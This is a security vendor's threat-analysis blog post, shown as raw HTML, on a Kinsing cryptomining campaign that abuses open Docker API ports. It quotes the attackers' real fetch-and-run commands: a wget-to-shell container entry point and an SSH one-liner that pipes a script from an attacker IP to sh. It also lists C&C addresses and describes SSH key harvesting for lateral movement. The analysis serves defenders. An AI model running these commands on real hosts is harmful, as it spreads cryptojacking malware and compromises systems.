<!doctype html><!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-us" > <![endif]--><!--[if IE 7]>    <html class="no-js lt-ie9 lt-ie8" lang="en-us" >        <![endif]--><!--[if IE 8]>    <html class="no-js lt-ie9" lang="en-us" >               <![endif]--><!--[if gt IE 8]><!--><html class="no-js" lang="en-us"><!--<![endif]--><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="author" content="Gal Singer">
    <meta name="description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta name="generator" content="HubSpot">
    <title>Threat Alert: Kinsing Malware Attacks Targeting Container Environments</title>
    <link rel="shortcut icon" href="https://blog.aquasec.com/hubfs/PNG__2020%20Aqua%20Logomark%20Color.png">
    

    <script src="/hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js"></script>
<script>hsjQuery = window['jQuery'];</script>
    <meta property="og:description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta property="og:title" content="Threat Alert: Kinsing Malware Attacks Targeting Container Environments">
    <meta name="twitter:description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta name="twitter:title" content="Threat Alert: Kinsing Malware Attacks Targeting Container Environments">

    

    

    <style>
a.cta_button{-moz-box-sizing:content-box !important;-webkit-box-sizing:content-box !important;box-sizing:content-box !important;vertical-align:middle}.hs-breadcrumb-menu{list-style-type:none;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px}.hs-breadcrumb-menu-item{float:left;padding:10px 0px 10px 10px}.hs-breadcrumb-menu-divider:before{content:'›';padding-left:10px}.hs-featured-image-link{border:0}.hs-featured-image{float:right;margin:0 0 20px 20px;max-width:50%}@media (max-width: 568px){.hs-featured-image{float:none;margin:0;width:100%;max-width:100%}}.hs-screen-reader-text{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}
</style>

<link rel="stylesheet" href="/hs/hsstatic/BlogSocialSharingSupport/static-1.16/bundles/project.css">
<link rel="stylesheet" href="/hs/hsstatic/AsyncSupport/static-1.122/sass/rss_post_listing.css">
<link rel="stylesheet" href="/hs/hsstatic/AsyncSupport/static-1.122/sass/comments_listing_asset.css" />
    


    
<!--  Added by GoogleAnalytics integration -->
<script>
var _hsp = window._hsp = window._hsp || [];
_hsp.push(['addPrivacyConsentListener', function(consent) { if (consent.allowed || (consent.categories && consent.categories.analytics)) {
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create','UA-63272154-1','auto');
  ga('send','pageview');
}}]);
</script>

<!-- /Added by GoogleAnalytics integration -->


<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5N9T3H');</script>
<!-- End Google Tag Manager -->
<link rel="amphtml" href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability?hs_amp=true">

<meta property="og:image" content="https://blog.aquasec.com/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg#keepProtocol">
<meta property="og:image:width" content="650">
<meta property="og:image:height" content="315">

<meta name="twitter:image" content="https://blog.aquasec.com/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg#keepProtocol">


<meta property="og:url" content="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability">
<meta name="twitter:card" content="summary_large_image">

<link rel="canonical" href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability">
<!-- Google Search consolde tag -->
<meta name="google-site-verification" content="PIrdhYZitmfjtBPSTPmEnlarvsbAf1WzRIpARVTY6D0">
<meta property="og:type" content="article">
<link rel="alternate" type="application/rss+xml" href="https://blog.aquasec.com/rss.xml">
<meta name="twitter:domain" content="blog.aquasec.com">
<meta name="twitter:site" content="@AquaSecTeam">
<script src="//platform.linkedin.com/in.js" type="text/javascript">
    lang: en_US
</script>

<meta http-equiv="content-language" content="en-us">
<link rel="stylesheet" href="//cdn2.hubspot.net/hub/7052064/hub_generated/template_assets/1640012778759/hubspot/hubspot_default/shared/responsive/layout.min.css">


<link rel="stylesheet" href="https://blog.aquasec.com/hs-fs/hub/1665891/hub_generated/template_assets/7511165869/1632661467789/Coded_files/Custom/page/Aqua_Theme_2019/aqua_theme_2019_styles.css">




</head>
<body class="blog custom-blog-post-page   hs-content-id-27901722055 hs-blog-post hs-blog-id-3657573699" style="">
    <div class="header-container-wrapper">
    <div class="header-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-global_group " style="" data-widget-type="global_group" data-x="0" data-w="12">
<div class="" data-global-widget-path="generated_global_groups/7511165832.html"><div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_153895222154164" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><!-- navbar_wrap starts -->
<div class="navbar_wrap">
<div class="container-fluid">
<div class="row-fluid">
<div class="page-center">
<div class="navbar-header"> 
<a class="navbar-brand" href="https://www.aquasec.com">Aqua Security</a>
<a id="menu-icon"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></a>
</div>
<nav class="navbar">
<ul id="main_menu_v2" class="nav navbar-nav">
<li class="menu-item"><a href="https://www.aquasec.com/products/aqua-cloud-native-security-platform/">Products</a></li>
<li class="menu-item"><a href="https://www.aquasec.com/solutions/kubernetes-container-security/">Solutions</a></li>
<li class="menu-item"><a href="https://www.aquasec.com/resources/">Resources</a></li>
<li class="menu-item"><a href="https://www.aquasec.com/about-us/">Company</a></li>
</ul>
</nav>
<div class="header_ctas">
<a href="#" class="search_box">Search</a>
<a href="https://cloud.aquasec.com/signin" class="type_txt" style="display:none;">Sign In</a>	
<a href="https://cloud.aquasec.com/signup" class="type_btn">Try Aqua</a>	
</div>
<div class="search_box_wrap">						
<form action="https://blog.aquasec.com/hs-search-results" method="GET">
<input type="text" class="navbar_search_input" name="term" autocomplete="off" placeholder="Enter a keyword to search the blog">
<input type="hidden" name="type" value="BLOG_POST">
<input type="hidden" name="length" value="SHORT">
<input type="submit" class="navbar_submit_button" value="Search">
</form>
<div class="search_box_close"></div>
</div>
</div><!-- page-center -->
<!--<div class="search_box_wrap">
<div class="page-center">
<div>
<script type="text/javascript">
var customConfigId = '574643120';
var javasriptResourceUrl = 'https://ui.customsearch.ai/api/ux/render?customConfig=574643120&market=en-US&safeSearch=Moderate';
var s = document.createElement('script');
s.setAttribute('type', 'text/javascript');
s.id = 'bcs_js_snippet';
s.src = javasriptResourceUrl;
var scripts = document.getElementsByTagName("script"),
currentScript = scripts[scripts.length-1];
currentScript.parentElement.appendChild(s);
</script>
</div>
<div class="search_box_close"></div>
</div>
</div>-->
</div><!-- row-fluid -->
</div><!-- container-fluid -->
</div>
<!-- navbar_wrap ends --></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->
</div>
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1553358480707282" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><!-- header_title_wrap starts -->
<div class="header_title_wrap">
<div class="container-fluid">
<div class="row-fluid">
<div class="page-center">
<div class="row">
<div class="span10">
<a href="/"><div class="header_title">Aqua Blog</div></a>
<!--<div class="header_subtitle"></div>-->
</div>
</div>
</div>
</div><!-- row-fluid -->
</div><!-- container-fluid -->
<div class="generic_header_blue_waves_top"></div>
<div class="generic_header_blue_waves_bottom"></div>
<div class="bluewaves_bg_sunrays"></div>		
</div>
<!-- header_title_wrap ends --></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end header -->
</div><!--end header wrapper -->

<div class="body-container-wrapper">
    <div class="body-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell page-center content-wrapper" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span9 widget-span widget-type-cell blog-content" style="" data-widget-type="cell" data-x="0" data-w="9">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_content " style="" data-widget-type="blog_content" data-x="0" data-w="12">
<div class="custom-blog-post-content">
    <div class="blog-section">
        <div class="blog-post-wrapper cell-wrapper">
                <div class="section post-header">
                  
                  
                  <div class="post-banner-image"><span id="hs_cos_wrapper_post_banner_image" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_linked_image" style="" data-hs-cos-general-type="widget" data-hs-cos-type="linked_image"><img src="https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=650&amp;name=threatAlertViralSpread4-650-315.jpg" class="hs-image-widget " style="width:650px;border-width:0px;border:0px;" width="650" alt="Container security" title="Container security" srcset="https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=325&amp;name=threatAlertViralSpread4-650-315.jpg 325w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=650&amp;name=threatAlertViralSpread4-650-315.jpg 650w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=975&amp;name=threatAlertViralSpread4-650-315.jpg 975w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1300&amp;name=threatAlertViralSpread4-650-315.jpg 1300w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1625&amp;name=threatAlertViralSpread4-650-315.jpg 1625w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1950&amp;name=threatAlertViralSpread4-650-315.jpg 1950w" sizes="(max-width: 650px) 100vw, 650px"></span></div>
                  
                  
                  <div class="post-date">

                    
                      <a href="/author/gal-singer" class="small-author-profile-link">
                      <div class="small-author-profile  small-author-profile-with-avatar">
                       <div class="small-author-avatar"> <img src="https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=28&amp;name=Gal%20Singer.jpg" alt="Picture of Gal Singer" width="28" srcset="https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=14&amp;name=Gal%20Singer.jpg 14w, https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=28&amp;name=Gal%20Singer.jpg 28w, https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=42&amp;name=Gal%20Singer.jpg 42w, https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=56&amp;name=Gal%20Singer.jpg 56w, https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=70&amp;name=Gal%20Singer.jpg 70w, https://blog.aquasec.com/hs-fs/hubfs/Gal%20Singer.jpg?width=84&amp;name=Gal%20Singer.jpg 84w" sizes="(max-width: 28px) 100vw, 28px"> </div> 
                      <div class="small-author-name">Gal Singer</div>
                      </div>
                      </a>
                    
                    
                      
                      April 03, 2020
                      
                   </div>
                  
                    <h1><span id="hs_cos_wrapper_name" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="text">Threat Alert: Kinsing Malware Attacks Targeting Container Environments</span></h1>
      
            </div>
            <div class="section post-body">
                <span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text"><p>Lately we’ve been witnessing a rise in the number of attacks that target container environments. We’ve been tracking an organized attack campaign that targets misconfigured open Docker Daemon API ports. This persistent campaign has been going on for months, with thousands of attempts taking place nearly on a daily basis. These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date.&nbsp;We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.</p>
<p><!--more--></p>
<p>The following graph shows the volume of attacks by day:</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1211&amp;name=Image%201.jpg" alt="Image 1" width="1211" style="width: 1211px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=606&amp;name=Image%201.jpg 606w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1211&amp;name=Image%201.jpg 1211w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1817&amp;name=Image%201.jpg 1817w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=2422&amp;name=Image%201.jpg 2422w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=3028&amp;name=Image%201.jpg 3028w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=3633&amp;name=Image%201.jpg 3633w" sizes="(max-width: 1211px) 100vw, 1211px"></p>
<p>In this attack, the attackers exploit a misconfigured Docker API port to run an Ubuntu container with the <span style="font-family: 'courier new', courier;">kinsing</span> malicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts. Our analysis of this attack vector exposes the techniques used, starting with exploiting the open port, through evasion tactics and lateral movement, all the way up to the end-goal of deploying the cryptominer.</p>
<h3>How the Attack is Initiated</h3>
<p>Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point:</p>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;"><span style="font-family: 'courier new', courier;">/bin/bash -c apt-get update &amp;&amp; apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null</span></td>
</tr>
</tbody>
</table>
<p>We saw this entry point in every attack in this campaign, with the only change being the IP address that&nbsp;<span style="font-family: 'courier new', courier;">d.sh</span>&nbsp;is downloaded from. We witnessed 3 IP addresses used in total--the one in the example above, <span style="font-family: 'courier new', courier;">217.12.221.244</span> and <span style="font-family: 'courier new', courier;">185.92.74.42</span></p>
<p>The command does the following:</p>
<ul>
<li>Update packages with <span style="font-family: 'courier new', courier;">apt-get update</span></li>
<li>Install wget with <span style="font-family: 'courier new', courier;">apt-get</span></li>
<li>Start the cron service.</li>
<li>Download a shell script with the just installed wget</li>
<li>Run the shell script and read <span>indefinitely from <span style="font-family: 'courier new', courier;">/dev/null</span> to keep the container alive and running</span></li>
</ul>
<p>We can see that the <span style="font-family: 'courier new', courier;">wget</span> program was required to download the cron shell script. The script would be later used in order to gain persistency within the container.</p>
<h3><span style="color: #425a75;">Defense Evasion and Persistence</span></h3>
<p>The shell script <span style="font-family: 'courier new', courier;">d.sh,</span> referred to from hereon as 'the shell script’, contains more than 600 lines. We discovered that the shell script does the following:</p>
<ol>
<li>Disables security measures and clears logs: <span style="font-family: 'courier new', courier; background-color: #ffffff;">echo SELINUX=disabled &gt;/etc/selinux/config</span></li>
<li>Kills numerous applications, notably other malwares and cryptominers.</li>
<li>Deletes files related to other malwares/cryptominers, most of them from the <span style="font-family: 'courier new', courier; background-color: #ffffff;">/tmp</span> directory</li>
<li>Kills running rival malicious Docker containers and deletes their image.</li>
<li>Downloads the ‘kinsing’ malware and runs it</li>
<li>Uses <span style="font-family: 'courier new', courier;">crontab</span> to download and run the shell script every minute</li>
<li>Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:<br><span style="font-family: 'courier new', courier; background-color: #ffffff;">crontab -l | sed '/update.sh/d' | crontab -</span></li>
</ol>
<h3><span style="color: #425a75;">Running the Malware</span></h3>
<p><strong>Kinsing</strong> is a Linux agent, identified by Virus Total after we submitted it for analysis. From here on we’ll refer to the malware as kinsing.&nbsp;</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1279&amp;name=Image%202.jpg" alt="Image 2" width="1279" style="width: 1279px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=640&amp;name=Image%202.jpg 640w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1279&amp;name=Image%202.jpg 1279w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1919&amp;name=Image%202.jpg 1919w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=2558&amp;name=Image%202.jpg 2558w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=3198&amp;name=Image%202.jpg 3198w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=3837&amp;name=Image%202.jpg 3837w" sizes="(max-width: 1279px) 100vw, 1279px"></p>
<p>A quick look at the malware’s strings reveals that it is a Golang-based Linux agent. It uses several Go libraries, including:</p>
<ul>
<li><strong>go-resty</strong> – an HTTP and REST client library, used to communicate with a Command and Control (C&amp;C) server.</li>
<li><strong>gopsutil</strong> – a process utility library, used for system and processes monitoring.</li>
<li><strong>osext</strong> – extension to the standard ‘os’ package, used to execute binaries.</li>
<li><strong>diskv</strong> - A disk-backed key-value store, for storage.</li>
</ul>
<p>Running the malware in a controlled environment and monitoring it brought up more details about its malicious actions.</p>
<h3><span style="color: #425a75;">Communication with C&amp;C servers</span></h3>
<p>Before the malware proceeded to deploy its payload, it attempted to communicate with servers in Eastern Europe. It appears that there are dedicated servers for each function that the malware executes:</p>
<ol>
<li>Attempts to establish a connection with the following IP address: 45.10.88.102. The attempts fail as the server does not respond.</li>
<li>Connects to 91.215.169.111, which appears to be the main C&amp;C server. The malware communicates with that host over HTTP port 80, and sends small encrypted messages on regular intervals, every few seconds.</li>
<li>Connects to 217.12.221.244/spre.sh, which we presume stands for spread, as we will see in the next paragraph, to download a shell script used for lateral movement purposes.</li>
<li>Connects to 193.33.87.219 to download the cryptominer C&amp;C communication.</li>
</ol>
<h3><span style="color: #425a75;">Discovery and Lateral Movement</span></h3>
<p>The <span style="font-family: 'courier new', courier;">spre.sh</span> shell script that the malware downloads is used to laterally spread the malware across the container network.</p>
<p>In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from <span style="font-family: 'courier new', courier;">/.ssh/config</span>, <span style="font-family: 'courier new', courier;">.bash_history</span>, <span style="font-family: 'courier new', courier;">/.ssh/known_hosts, </span>and the likes. We did not identify any active scanning techniques used to identify additional targets.</p>
<p>Using the information gathered, the malware then attempts to connect to each host, using every possible user and key combination through SSH, in order to download the aforementioned shell script and run the malware on other hosts or containers in the network.</p>
<p>The actual shell script is named <span style="font-family: 'courier new', courier;">spr.sh</span>&nbsp;this time around, but it is identical to the a <span style="font-family: 'courier new', courier;">d.sh</span>&nbsp;shell script used earlier in the attack sequence</p>
<p>The following SSH command was used to spread it throughout the network:</p>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;"><span style="font-family: 'courier new', courier;">ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://217.12.221.244/spr.sh|sh; sudo wget -q -O - http://217.12.221.244/spr.sh|sh;"</span></td>
</tr>
</tbody>
</table>
<p>We noticed a comment in the script for a 20 seconds sleep after every 20 SSH connection attempts, and their cleanup, possibly indicating that the attackers have some sense of evasion and were trying to hide their activities.</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=850&amp;name=Image%203.jpg" alt="Image 3" width="850" style="width: 850px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=425&amp;name=Image%203.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=850&amp;name=Image%203.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=1275&amp;name=Image%203.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=1700&amp;name=Image%203.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=2125&amp;name=Image%203.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=2550&amp;name=Image%203.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></p>
<p style="text-align: center;"><em>Spre.sh script</em></p>
<p>At the last stage of the attack the malware runs a cryptominer called <span style="font-family: 'courier new', courier;">kdevtmpfsi</span>. The cryptominer was identified by Virus Total as a Bitcoin miner.</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1284&amp;name=Image%204.jpg" alt="Image 4" width="1284" style="width: 1284px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=642&amp;name=Image%204.jpg 642w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1284&amp;name=Image%204.jpg 1284w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1926&amp;name=Image%204.jpg 1926w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=2568&amp;name=Image%204.jpg 2568w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=3210&amp;name=Image%204.jpg 3210w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=3852&amp;name=Image%204.jpg 3852w" sizes="(max-width: 1284px) 100vw, 1284px"></p>
<p>The cryptominer connects to a host with the 193.33.87.219 IP address using a log in request over HTTP, receives further instructions, and starts mining cryptocurrency.</p>
<div>The infographic below illustrates the full flow of the attack:</div>
<div><a href="https://cdn2.hubspot.net/hubfs/1665891/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography.png" rel=" noopener"><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=850&amp;name=KinsingMalwareInfography_800.jpg" alt="KinsingMalwareInfography_800" width="850" style="width: 850px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=425&amp;name=KinsingMalwareInfography_800.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=850&amp;name=KinsingMalwareInfography_800.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=1275&amp;name=KinsingMalwareInfography_800.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=1700&amp;name=KinsingMalwareInfography_800.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=2125&amp;name=KinsingMalwareInfography_800.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=2550&amp;name=KinsingMalwareInfography_800.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></a></div>
<div>&nbsp;</div>
<h3><span style="color: #425a75;">Summary</span></h3>
<p>This attack stands out as yet another example of the growing threat to cloud native environments. With deployments becoming larger and container use on the rise, attackers are upping their game and mounting more ambitious attacks, with an increasing level of sophistication.</p>
<p>Here is a summary of the attack components, mapping each component of the attack to the corresponding <a href="https://attack.mitre.org/" rel="noopener" target="_blank">MITREAtt&amp;ck</a>&nbsp;tactics and techniques category:</p>
<p><a href="https://cdn2.hubspot.net/hubfs/1665891/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%205%20High%20Res.jpg" rel="noopener" target="_blank"><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=850&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg" width="850" style="width: 850px;" alt="MITREAtta&amp;ck tactics and techniques" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=425&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=850&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=1275&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=1700&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=2125&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=2550&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></a></p>
<p>We believe that DevSecOps teams must also up their game and become aware of the threats that are lurking in the cloud, and develop a security strategy to mitigate risks. Here’s a list of steps we’d consider making:</p>
<ol>
<li>Identify all cloud resources and group them by some logical structure.</li>
<li>Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege.</li>
<li>Scan the images that you use, making sure you are familiar with them and their use, using minimal privileges such as avoiding root user and privileged mode. Use <a href="https://github.com/aquasecurity/trivy" rel="noopener" target="_blank">Trivy the Open Source vulnerability scanner</a>.<u style="background-color: transparent;"></u></li>
